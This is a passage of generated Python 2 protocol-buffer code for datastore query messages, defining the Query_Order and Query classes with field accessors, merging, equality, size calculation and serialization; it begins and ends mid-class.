        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_property().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render a human-readable text form showing only the present fields."""
    res=""
    if self.has_op_: res+=prefix+("op: %s\n" % self.DebugFormatInt32(self.op_))
    cnt=0
    for e in self.property_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("property%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res

class Query_Order(ProtocolBuffer.ProtocolMessage):
  """Generated group class: the ``order`` group of a datastore Query.

  Holds a required string ``property`` and an optional ``direction``
  (a Direction enum value, defaulting to ASCENDING).
  """


  # Direction enum values.
  ASCENDING    =    1
  DESCENDING   =    2

  _Direction_NAMES = {
    1: "ASCENDING",
    2: "DESCENDING",
  }

  # classmethod applied explicitly (pre-decorator-syntax generated code).
  def Direction_Name(cls, x): return cls._Direction_NAMES.get(x, "")
  Direction_Name = classmethod(Direction_Name)

  has_property_ = 0
  property_ = ""
  has_direction_ = 0
  direction_ = 1

  def __init__(self, contents=None):
    if contents is not None: self.MergeFromString(contents)

  def property(self): return self.property_

  def set_property(self, x):
    self.has_property_ = 1
    self.property_ = x

  def clear_property(self):
    if self.has_property_:
      self.has_property_ = 0
      self.property_ = ""

  def has_property(self): return self.has_property_

  def direction(self): return self.direction_

  def set_direction(self, x):
    self.has_direction_ = 1
    self.direction_ = x

  def clear_direction(self):
    if self.has_direction_:
      self.has_direction_ = 0
      self.direction_ = 1

  def has_direction(self): return self.has_direction_


  def MergeFrom(self, x):
    """Copy every field that is present on ``x`` over our own value."""
    assert x is not self
    if (x.has_property()): self.set_property(x.property())
    if (x.has_direction()): self.set_direction(x.direction())

  def Equals(self, x):
    """Field-wise equality: presence flags must match, then values."""
    if x is self: return 1
    if self.has_property_ != x.has_property_: return 0
    if self.has_property_ and self.property_ != x.property_: return 0
    if self.has_direction_ != x.has_direction_: return 0
    if self.has_direction_ and self.direction_ != x.direction_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # property is required; direction is optional.
    initialized = 1
    if (not self.has_property_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: property not set.')
    return initialized

  def ByteSize(self):
    # +1 is the tag byte of the required property field.
    n = 0
    n += self.lengthString(len(self.property_))
    if (self.has_direction_): n += 1 + self.lengthVarInt64(self.direction_)
    return n + 1

  def ByteSizePartial(self):
    # Like ByteSize, but property is only counted when present.
    n = 0
    if (self.has_property_):
      n += 1
      n += self.lengthString(len(self.property_))
    if (self.has_direction_): n += 1 + self.lengthVarInt64(self.direction_)
    return n

  def Clear(self):
    self.clear_property()
    self.clear_direction()

  def OutputUnchecked(self, out):
    # Wire tags: property=82 (string), direction=88 (varint).
    out.putVarInt32(82)
    out.putPrefixedString(self.property_)
    if (self.has_direction_):
      out.putVarInt32(88)
      out.putVarInt32(self.direction_)

  def OutputPartial(self, out):
    # Same as OutputUnchecked, but property is skipped when unset.
    if (self.has_property_):
      out.putVarInt32(82)
      out.putPrefixedString(self.property_)
    if (self.has_direction_):
      out.putVarInt32(88)
      out.putVarInt32(self.direction_)

  def TryMerge(self, d):
    # Decode until the group terminator (tag 76); unknown tags are
    # skipped, tag 0 indicates corrupt data.
    while 1:
      tt = d.getVarInt32()
      if tt == 76: break
      if tt == 82:
        self.set_property(d.getPrefixedString())
        continue
      if tt == 88:
        self.set_direction(d.getVarInt32())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    """Render a human-readable text form showing only the present fields."""
    res=""
    if self.has_property_: res+=prefix+("property: %s\n" % self.DebugFormatString(self.property_))
    if self.has_direction_: res+=prefix+("direction: %s\n" % self.DebugFormatInt32(self.direction_))
    return res

class Query(ProtocolBuffer.ProtocolMessage):


  # Hint enum values, with a value->name lookup table used by Hint_Name.
  ORDER_FIRST  =    1
  ANCESTOR_FIRST =    2
  FILTER_FIRST =    3

  _Hint_NAMES = {
    1: "ORDER_FIRST",
    2: "ANCESTOR_FIRST",
    3: "FILTER_FIRST",
  }

  # Return the symbolic name for hint value x, or "" if x is unknown.
  def Hint_Name(cls, x): return cls._Hint_NAMES.get(x, "")
  Hint_Name = classmethod(Hint_Name)

  # Presence flags (has_*) and per-field default values, held as class
  # attributes until an instance overrides them via a setter.  Sub-message
  # fields default to None and are created lazily; note that
  # persist_offset_ defaults to 1, unlike the other scalars.
  has_header_ = 0
  header_ = None
  has_app_ = 0
  app_ = ""
  has_name_space_ = 0
  name_space_ = ""
  has_kind_ = 0
  kind_ = ""
  has_ancestor_ = 0
  ancestor_ = None
  has_search_query_ = 0
  search_query_ = ""
  has_hint_ = 0
  hint_ = 0
  has_count_ = 0
  count_ = 0
  has_offset_ = 0
  offset_ = 0
  has_limit_ = 0
  limit_ = 0
  has_compiled_cursor_ = 0
  compiled_cursor_ = None
  has_end_compiled_cursor_ = 0
  end_compiled_cursor_ = None
  has_require_perfect_plan_ = 0
  require_perfect_plan_ = 0
  has_keys_only_ = 0
  keys_only_ = 0
  has_transaction_ = 0
  transaction_ = None
  has_compile_ = 0
  compile_ = 0
  has_failover_ms_ = 0
  failover_ms_ = 0
  has_strong_ = 0
  strong_ = 0
  has_distinct_ = 0
  distinct_ = 0
  has_min_safe_time_seconds_ = 0
  min_safe_time_seconds_ = 0
  has_persist_offset_ = 0
  persist_offset_ = 1

  def __init__(self, contents=None):
    # Initialize all repeated-field backing lists, create the lock that
    # guards lazy creation of sub-messages, then (optionally) parse
    # `contents` as a serialized message into self.
    self.filter_ = []
    self.order_ = []
    self.composite_index_ = []
    self.property_name_ = []
    self.group_by_property_name_ = []
    self.safe_replica_name_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Lazily construct the InternalHeader sub-message; double-checked
    # under lazy_init_lock_ so it is created at most once.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    # Mark unset but keep the allocated sub-message (Clear()ed) for reuse.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def app(self):
    """Accessors for the required string field 'app'."""
    return self.app_

  def set_app(self, x):
    self.app_ = x
    self.has_app_ = 1

  def clear_app(self):
    if self.has_app_:
      self.app_ = ""
      self.has_app_ = 0

  def has_app(self):
    return self.has_app_

  def name_space(self):
    """Accessors for the optional string field 'name_space'."""
    return self.name_space_

  def set_name_space(self, x):
    self.name_space_ = x
    self.has_name_space_ = 1

  def clear_name_space(self):
    if self.has_name_space_:
      self.name_space_ = ""
      self.has_name_space_ = 0

  def has_name_space(self):
    return self.has_name_space_

  def kind(self):
    """Accessors for the optional string field 'kind'."""
    return self.kind_

  def set_kind(self, x):
    self.kind_ = x
    self.has_kind_ = 1

  def clear_kind(self):
    if self.has_kind_:
      self.kind_ = ""
      self.has_kind_ = 0

  def has_kind(self):
    return self.has_kind_

  def ancestor(self):
    # Lazily construct the Reference sub-message; double-checked under
    # lazy_init_lock_ so it is created at most once.
    if self.ancestor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.ancestor_ is None: self.ancestor_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.ancestor_

  def mutable_ancestor(self): self.has_ancestor_ = 1; return self.ancestor()

  def clear_ancestor(self):

    # Mark unset but keep the allocated sub-message (Clear()ed) for reuse.
    if self.has_ancestor_:
      self.has_ancestor_ = 0;
      if self.ancestor_ is not None: self.ancestor_.Clear()

  def has_ancestor(self): return self.has_ancestor_

  def filter_size(self):
    """Accessors for the repeated group field 'filter'."""
    return len(self.filter_)

  def filter_list(self):
    return self.filter_

  def filter(self, i):
    return self.filter_[i]

  def mutable_filter(self, i):
    return self.filter_[i]

  def add_filter(self):
    elem = Query_Filter()
    self.filter_.append(elem)
    return elem

  def clear_filter(self):
    self.filter_ = []
  def search_query(self):
    """Accessors for the optional string field 'search_query'."""
    return self.search_query_

  def set_search_query(self, x):
    self.search_query_ = x
    self.has_search_query_ = 1

  def clear_search_query(self):
    if self.has_search_query_:
      self.search_query_ = ""
      self.has_search_query_ = 0

  def has_search_query(self):
    return self.has_search_query_

  def order_size(self):
    """Accessors for the repeated group field 'order'."""
    return len(self.order_)

  def order_list(self):
    return self.order_

  def order(self, i):
    return self.order_[i]

  def mutable_order(self, i):
    return self.order_[i]

  def add_order(self):
    elem = Query_Order()
    self.order_.append(elem)
    return elem

  def clear_order(self):
    self.order_ = []
  def hint(self):
    """Accessors for the optional enum field 'hint'."""
    return self.hint_

  def set_hint(self, x):
    self.hint_ = x
    self.has_hint_ = 1

  def clear_hint(self):
    if self.has_hint_:
      self.hint_ = 0
      self.has_hint_ = 0

  def has_hint(self):
    return self.has_hint_

  def count(self):
    """Accessors for the optional int field 'count'."""
    return self.count_

  def set_count(self, x):
    self.count_ = x
    self.has_count_ = 1

  def clear_count(self):
    if self.has_count_:
      self.count_ = 0
      self.has_count_ = 0

  def has_count(self):
    return self.has_count_

  def offset(self):
    """Accessors for the optional int field 'offset'."""
    return self.offset_

  def set_offset(self, x):
    self.offset_ = x
    self.has_offset_ = 1

  def clear_offset(self):
    if self.has_offset_:
      self.offset_ = 0
      self.has_offset_ = 0

  def has_offset(self):
    return self.has_offset_

  def limit(self):
    """Accessors for the optional int field 'limit'."""
    return self.limit_

  def set_limit(self, x):
    self.limit_ = x
    self.has_limit_ = 1

  def clear_limit(self):
    if self.has_limit_:
      self.limit_ = 0
      self.has_limit_ = 0

  def has_limit(self):
    return self.has_limit_

  def compiled_cursor(self):
    # Lazily construct the CompiledCursor sub-message; double-checked
    # under lazy_init_lock_ so it is created at most once.
    if self.compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.compiled_cursor_ is None: self.compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.compiled_cursor_

  def mutable_compiled_cursor(self): self.has_compiled_cursor_ = 1; return self.compiled_cursor()

  def clear_compiled_cursor(self):

    # Mark unset but keep the allocated sub-message (Clear()ed) for reuse.
    if self.has_compiled_cursor_:
      self.has_compiled_cursor_ = 0;
      if self.compiled_cursor_ is not None: self.compiled_cursor_.Clear()

  def has_compiled_cursor(self): return self.has_compiled_cursor_

  def end_compiled_cursor(self):
    # Lazily construct the CompiledCursor sub-message; double-checked
    # under lazy_init_lock_ so it is created at most once.
    if self.end_compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.end_compiled_cursor_ is None: self.end_compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.end_compiled_cursor_

  def mutable_end_compiled_cursor(self): self.has_end_compiled_cursor_ = 1; return self.end_compiled_cursor()

  def clear_end_compiled_cursor(self):

    # Mark unset but keep the allocated sub-message (Clear()ed) for reuse.
    if self.has_end_compiled_cursor_:
      self.has_end_compiled_cursor_ = 0;
      if self.end_compiled_cursor_ is not None: self.end_compiled_cursor_.Clear()

  def has_end_compiled_cursor(self): return self.has_end_compiled_cursor_

  def composite_index_size(self):
    """Accessors for the repeated message field 'composite_index'."""
    return len(self.composite_index_)

  def composite_index_list(self):
    return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    elem = CompositeIndex()
    self.composite_index_.append(elem)
    return elem

  def clear_composite_index(self):
    self.composite_index_ = []
  def require_perfect_plan(self):
    """Accessors for the optional bool field 'require_perfect_plan'."""
    return self.require_perfect_plan_

  def set_require_perfect_plan(self, x):
    self.require_perfect_plan_ = x
    self.has_require_perfect_plan_ = 1

  def clear_require_perfect_plan(self):
    if self.has_require_perfect_plan_:
      self.require_perfect_plan_ = 0
      self.has_require_perfect_plan_ = 0

  def has_require_perfect_plan(self):
    return self.has_require_perfect_plan_

  def keys_only(self):
    """Accessors for the optional bool field 'keys_only'."""
    return self.keys_only_

  def set_keys_only(self, x):
    self.keys_only_ = x
    self.has_keys_only_ = 1

  def clear_keys_only(self):
    if self.has_keys_only_:
      self.keys_only_ = 0
      self.has_keys_only_ = 0

  def has_keys_only(self):
    return self.has_keys_only_

  def transaction(self):
    # Lazily construct the Transaction sub-message; double-checked under
    # lazy_init_lock_ so it is created at most once.
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    # Mark unset but keep the allocated sub-message (Clear()ed) for reuse.
    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def compile(self):
    """Accessors for the optional bool field 'compile'."""
    return self.compile_

  def set_compile(self, x):
    self.compile_ = x
    self.has_compile_ = 1

  def clear_compile(self):
    if self.has_compile_:
      self.compile_ = 0
      self.has_compile_ = 0

  def has_compile(self):
    return self.has_compile_

  def failover_ms(self):
    """Accessors for the optional int64 field 'failover_ms'."""
    return self.failover_ms_

  def set_failover_ms(self, x):
    self.failover_ms_ = x
    self.has_failover_ms_ = 1

  def clear_failover_ms(self):
    if self.has_failover_ms_:
      self.failover_ms_ = 0
      self.has_failover_ms_ = 0

  def has_failover_ms(self):
    return self.has_failover_ms_

  def strong(self):
    """Accessors for the optional bool field 'strong'."""
    return self.strong_

  def set_strong(self, x):
    self.strong_ = x
    self.has_strong_ = 1

  def clear_strong(self):
    if self.has_strong_:
      self.strong_ = 0
      self.has_strong_ = 0

  def has_strong(self):
    return self.has_strong_

  def property_name_size(self):
    """Accessors for the repeated string field 'property_name'."""
    return len(self.property_name_)

  def property_name_list(self):
    return self.property_name_

  def property_name(self, i):
    return self.property_name_[i]

  def set_property_name(self, i, x):
    self.property_name_[i] = x

  def add_property_name(self, x):
    self.property_name_.append(x)

  def clear_property_name(self):
    self.property_name_ = []

  def group_by_property_name_size(self):
    """Accessors for the repeated string field 'group_by_property_name'."""
    return len(self.group_by_property_name_)

  def group_by_property_name_list(self):
    return self.group_by_property_name_

  def group_by_property_name(self, i):
    return self.group_by_property_name_[i]

  def set_group_by_property_name(self, i, x):
    self.group_by_property_name_[i] = x

  def add_group_by_property_name(self, x):
    self.group_by_property_name_.append(x)

  def clear_group_by_property_name(self):
    self.group_by_property_name_ = []

  def distinct(self):
    """Accessors for the optional bool field 'distinct'."""
    return self.distinct_

  def set_distinct(self, x):
    self.distinct_ = x
    self.has_distinct_ = 1

  def clear_distinct(self):
    if self.has_distinct_:
      self.distinct_ = 0
      self.has_distinct_ = 0

  def has_distinct(self):
    return self.has_distinct_

  def min_safe_time_seconds(self):
    """Accessors for the optional int64 field 'min_safe_time_seconds'."""
    return self.min_safe_time_seconds_

  def set_min_safe_time_seconds(self, x):
    self.min_safe_time_seconds_ = x
    self.has_min_safe_time_seconds_ = 1

  def clear_min_safe_time_seconds(self):
    if self.has_min_safe_time_seconds_:
      self.min_safe_time_seconds_ = 0
      self.has_min_safe_time_seconds_ = 0

  def has_min_safe_time_seconds(self):
    return self.has_min_safe_time_seconds_

  def safe_replica_name_size(self):
    """Accessors for the repeated string field 'safe_replica_name'."""
    return len(self.safe_replica_name_)

  def safe_replica_name_list(self):
    return self.safe_replica_name_

  def safe_replica_name(self, i):
    return self.safe_replica_name_[i]

  def set_safe_replica_name(self, i, x):
    self.safe_replica_name_[i] = x

  def add_safe_replica_name(self, x):
    self.safe_replica_name_.append(x)

  def clear_safe_replica_name(self):
    self.safe_replica_name_ = []

  def persist_offset(self):
    """Accessors for the optional bool field 'persist_offset' (default 1)."""
    return self.persist_offset_

  def set_persist_offset(self, x):
    self.persist_offset_ = x
    self.has_persist_offset_ = 1

  def clear_persist_offset(self):
    if self.has_persist_offset_:
      self.persist_offset_ = 1
      self.has_persist_offset_ = 0

  def has_persist_offset(self):
    return self.has_persist_offset_


  def MergeFrom(self, x):
    # Merge every set field of message x into self: scalars overwrite,
    # sub-messages merge recursively, repeated fields append copies.
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_app()): self.set_app(x.app())
    if (x.has_name_space()): self.set_name_space(x.name_space())
    if (x.has_kind()): self.set_kind(x.kind())
    if (x.has_ancestor()): self.mutable_ancestor().MergeFrom(x.ancestor())
    for i in xrange(x.filter_size()): self.add_filter().CopyFrom(x.filter(i))
    if (x.has_search_query()): self.set_search_query(x.search_query())
    for i in xrange(x.order_size()): self.add_order().CopyFrom(x.order(i))
    if (x.has_hint()): self.set_hint(x.hint())
    if (x.has_count()): self.set_count(x.count())
    if (x.has_offset()): self.set_offset(x.offset())
    if (x.has_limit()): self.set_limit(x.limit())
    if (x.has_compiled_cursor()): self.mutable_compiled_cursor().MergeFrom(x.compiled_cursor())
    if (x.has_end_compiled_cursor()): self.mutable_end_compiled_cursor().MergeFrom(x.end_compiled_cursor())
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_require_perfect_plan()): self.set_require_perfect_plan(x.require_perfect_plan())
    if (x.has_keys_only()): self.set_keys_only(x.keys_only())
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    if (x.has_compile()): self.set_compile(x.compile())
    if (x.has_failover_ms()): self.set_failover_ms(x.failover_ms())
    if (x.has_strong()): self.set_strong(x.strong())
    for i in xrange(x.property_name_size()): self.add_property_name(x.property_name(i))
    for i in xrange(x.group_by_property_name_size()): self.add_group_by_property_name(x.group_by_property_name(i))
    if (x.has_distinct()): self.set_distinct(x.distinct())
    if (x.has_min_safe_time_seconds()): self.set_min_safe_time_seconds(x.min_safe_time_seconds())
    for i in xrange(x.safe_replica_name_size()): self.add_safe_replica_name(x.safe_replica_name(i))
    if (x.has_persist_offset()): self.set_persist_offset(x.persist_offset())

  def Equals(self, x):
    # Deep field-by-field equality: presence flags must match, and present
    # fields (including all repeated elements, in order) must compare equal.
    # Returns 1 on equality, 0 otherwise.
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    if self.has_name_space_ != x.has_name_space_: return 0
    if self.has_name_space_ and self.name_space_ != x.name_space_: return 0
    if self.has_kind_ != x.has_kind_: return 0
    if self.has_kind_ and self.kind_ != x.kind_: return 0
    if self.has_ancestor_ != x.has_ancestor_: return 0
    if self.has_ancestor_ and self.ancestor_ != x.ancestor_: return 0
    if len(self.filter_) != len(x.filter_): return 0
    for e1, e2 in zip(self.filter_, x.filter_):
      if e1 != e2: return 0
    if self.has_search_query_ != x.has_search_query_: return 0
    if self.has_search_query_ and self.search_query_ != x.search_query_: return 0
    if len(self.order_) != len(x.order_): return 0
    for e1, e2 in zip(self.order_, x.order_):
      if e1 != e2: return 0
    if self.has_hint_ != x.has_hint_: return 0
    if self.has_hint_ and self.hint_ != x.hint_: return 0
    if self.has_count_ != x.has_count_: return 0
    if self.has_count_ and self.count_ != x.count_: return 0
    if self.has_offset_ != x.has_offset_: return 0
    if self.has_offset_ and self.offset_ != x.offset_: return 0
    if self.has_limit_ != x.has_limit_: return 0
    if self.has_limit_ and self.limit_ != x.limit_: return 0
    if self.has_compiled_cursor_ != x.has_compiled_cursor_: return 0
    if self.has_compiled_cursor_ and self.compiled_cursor_ != x.compiled_cursor_: return 0
    if self.has_end_compiled_cursor_ != x.has_end_compiled_cursor_: return 0
    if self.has_end_compiled_cursor_ and self.end_compiled_cursor_ != x.end_compiled_cursor_: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_require_perfect_plan_ != x.has_require_perfect_plan_: return 0
    if self.has_require_perfect_plan_ and self.require_perfect_plan_ != x.require_perfect_plan_: return 0
    if self.has_keys_only_ != x.has_keys_only_: return 0
    if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if self.has_compile_ != x.has_compile_: return 0
    if self.has_compile_ and self.compile_ != x.compile_: return 0
    if self.has_failover_ms_ != x.has_failover_ms_: return 0
    if self.has_failover_ms_ and self.failover_ms_ != x.failover_ms_: return 0
    if self.has_strong_ != x.has_strong_: return 0
    if self.has_strong_ and self.strong_ != x.strong_: return 0
    if len(self.property_name_) != len(x.property_name_): return 0
    for e1, e2 in zip(self.property_name_, x.property_name_):
      if e1 != e2: return 0
    if len(self.group_by_property_name_) != len(x.group_by_property_name_): return 0
    for e1, e2 in zip(self.group_by_property_name_, x.group_by_property_name_):
      if e1 != e2: return 0
    if self.has_distinct_ != x.has_distinct_: return 0
    if self.has_distinct_ and self.distinct_ != x.distinct_: return 0
    if self.has_min_safe_time_seconds_ != x.has_min_safe_time_seconds_: return 0
    if self.has_min_safe_time_seconds_ and self.min_safe_time_seconds_ != x.min_safe_time_seconds_: return 0
    if len(self.safe_replica_name_) != len(x.safe_replica_name_): return 0
    for e1, e2 in zip(self.safe_replica_name_, x.safe_replica_name_):
      if e1 != e2: return 0
    if self.has_persist_offset_ != x.has_persist_offset_: return 0
    if self.has_persist_offset_ and self.persist_offset_ != x.persist_offset_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # 1 iff the required 'app' field is set and every present/repeated
    # sub-message is itself initialized; appends notes to debug_strs
    # (when given) for anything missing.
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_app_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: app not set.')
    if (self.has_ancestor_ and not self.ancestor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.filter_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.order_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_compiled_cursor_ and not self.compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_end_compiled_cursor_ and not self.end_compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    # Full serialized size.  The literal 1/2/3 addends are tag-byte counts
    # for each field number (+1 for a bool payload); repeated group fields
    # pre-add 2 bytes per element (begin/end group tags).  The trailing +1
    # is the tag byte for the required 'app' field.
    n = 0
    if (self.has_header_): n += 2 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(len(self.app_))
    if (self.has_name_space_): n += 2 + self.lengthString(len(self.name_space_))
    if (self.has_kind_): n += 1 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSize())
    n += 2 * len(self.filter_)
    for i in xrange(len(self.filter_)): n += self.filter_[i].ByteSize()
    if (self.has_search_query_): n += 1 + self.lengthString(len(self.search_query_))
    n += 2 * len(self.order_)
    for i in xrange(len(self.order_)): n += self.order_[i].ByteSize()
    if (self.has_hint_): n += 2 + self.lengthVarInt64(self.hint_)
    if (self.has_count_): n += 2 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 2 + self.lengthVarInt64(self.limit_)
    if (self.has_compiled_cursor_): n += 2 + self.lengthString(self.compiled_cursor_.ByteSize())
    if (self.has_end_compiled_cursor_): n += 2 + self.lengthString(self.end_compiled_cursor_.ByteSize())
    n += 2 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_require_perfect_plan_): n += 3
    if (self.has_keys_only_): n += 3
    if (self.has_transaction_): n += 2 + self.lengthString(self.transaction_.ByteSize())
    if (self.has_compile_): n += 3
    if (self.has_failover_ms_): n += 2 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 3
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    n += 2 * len(self.group_by_property_name_)
    for i in xrange(len(self.group_by_property_name_)): n += self.lengthString(len(self.group_by_property_name_[i]))
    if (self.has_distinct_): n += 3
    if (self.has_min_safe_time_seconds_): n += 2 + self.lengthVarInt64(self.min_safe_time_seconds_)
    n += 2 * len(self.safe_replica_name_)
    for i in xrange(len(self.safe_replica_name_)): n += self.lengthString(len(self.safe_replica_name_[i]))
    if (self.has_persist_offset_): n += 3
    return n + 1

  def ByteSizePartial(self):
    # Like ByteSize, but tolerant of missing required fields: the required
    # 'app' is counted (1 tag byte + payload) only when actually set, and
    # sub-message sizes use their ByteSizePartial.
    n = 0
    if (self.has_header_): n += 2 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_app_):
      n += 1
      n += self.lengthString(len(self.app_))
    if (self.has_name_space_): n += 2 + self.lengthString(len(self.name_space_))
    if (self.has_kind_): n += 1 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSizePartial())
    n += 2 * len(self.filter_)
    for i in xrange(len(self.filter_)): n += self.filter_[i].ByteSizePartial()
    if (self.has_search_query_): n += 1 + self.lengthString(len(self.search_query_))
    n += 2 * len(self.order_)
    for i in xrange(len(self.order_)): n += self.order_[i].ByteSizePartial()
    if (self.has_hint_): n += 2 + self.lengthVarInt64(self.hint_)
    if (self.has_count_): n += 2 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 2 + self.lengthVarInt64(self.limit_)
    if (self.has_compiled_cursor_): n += 2 + self.lengthString(self.compiled_cursor_.ByteSizePartial())
    if (self.has_end_compiled_cursor_): n += 2 + self.lengthString(self.end_compiled_cursor_.ByteSizePartial())
    n += 2 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_require_perfect_plan_): n += 3
    if (self.has_keys_only_): n += 3
    if (self.has_transaction_): n += 2 + self.lengthString(self.transaction_.ByteSizePartial())
    if (self.has_compile_): n += 3
    if (self.has_failover_ms_): n += 2 + self.lengthVarInt64(self.failover_ms_)
    if (self.has_strong_): n += 3
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    n += 2 * len(self.group_by_property_name_)
    for i in xrange(len(self.group_by_property_name_)): n += self.lengthString(len(self.group_by_property_name_[i]))
    if (self.has_distinct_): n += 3
    if (self.has_min_safe_time_seconds_): n += 2 + self.lengthVarInt64(self.min_safe_time_seconds_)
    n += 2 * len(self.safe_replica_name_)
    for i in xrange(len(self.safe_replica_name_)): n += self.lengthString(len(self.safe_replica_name_[i]))
    if (self.has_persist_offset_): n += 3
    return n

  def Clear(self):
    # Reset every field to its unset/default state, in declaration order.
    self.clear_header()
    self.clear_app()
    self.clear_name_space()
    self.clear_kind()
    self.clear_ancestor()
    self.clear_filter()
    self.clear_search_query()
    self.clear_order()
    self.clear_hint()
    self.clear_count()
    self.clear_offset()
    self.clear_limit()
    self.clear_compiled_cursor()
    self.clear_end_compiled_cursor()
    self.clear_composite_index()
    self.clear_require_perfect_plan()
    self.clear_keys_only()
    self.clear_transaction()
    self.clear_compile()
    self.clear_failover_ms()
    self.clear_strong()
    self.clear_property_name()
    self.clear_group_by_property_name()
    self.clear_distinct()
    self.clear_min_safe_time_seconds()
    self.clear_safe_replica_name()
    self.clear_persist_offset()

  def OutputUnchecked(self, out):
    # Serialize to 'out' without verifying required fields; fields are
    # written in ascending tag order.  Group fields bracket each element
    # with begin/end tags (filter: 35/36, order: 75/76).
    out.putVarInt32(10)
    out.putPrefixedString(self.app_)
    if (self.has_kind_):
      out.putVarInt32(26)
      out.putPrefixedString(self.kind_)
    for i in xrange(len(self.filter_)):
      out.putVarInt32(35)
      self.filter_[i].OutputUnchecked(out)
      out.putVarInt32(36)
    if (self.has_search_query_):
      out.putVarInt32(66)
      out.putPrefixedString(self.search_query_)
    for i in xrange(len(self.order_)):
      out.putVarInt32(75)
      self.order_[i].OutputUnchecked(out)
      out.putVarInt32(76)
    if (self.has_offset_):
      out.putVarInt32(96)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(128)
      out.putVarInt32(self.limit_)
    if (self.has_ancestor_):
      out.putVarInt32(138)
      out.putVarInt32(self.ancestor_.ByteSize())
      self.ancestor_.OutputUnchecked(out)
    if (self.has_hint_):
      out.putVarInt32(144)
      out.putVarInt32(self.hint_)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(154)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)
    if (self.has_require_perfect_plan_):
      out.putVarInt32(160)
      out.putBoolean(self.require_perfect_plan_)
    if (self.has_keys_only_):
      out.putVarInt32(168)
      out.putBoolean(self.keys_only_)
    if (self.has_transaction_):
      out.putVarInt32(178)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    if (self.has_count_):
      out.putVarInt32(184)
      out.putVarInt32(self.count_)
    if (self.has_distinct_):
      out.putVarInt32(192)
      out.putBoolean(self.distinct_)
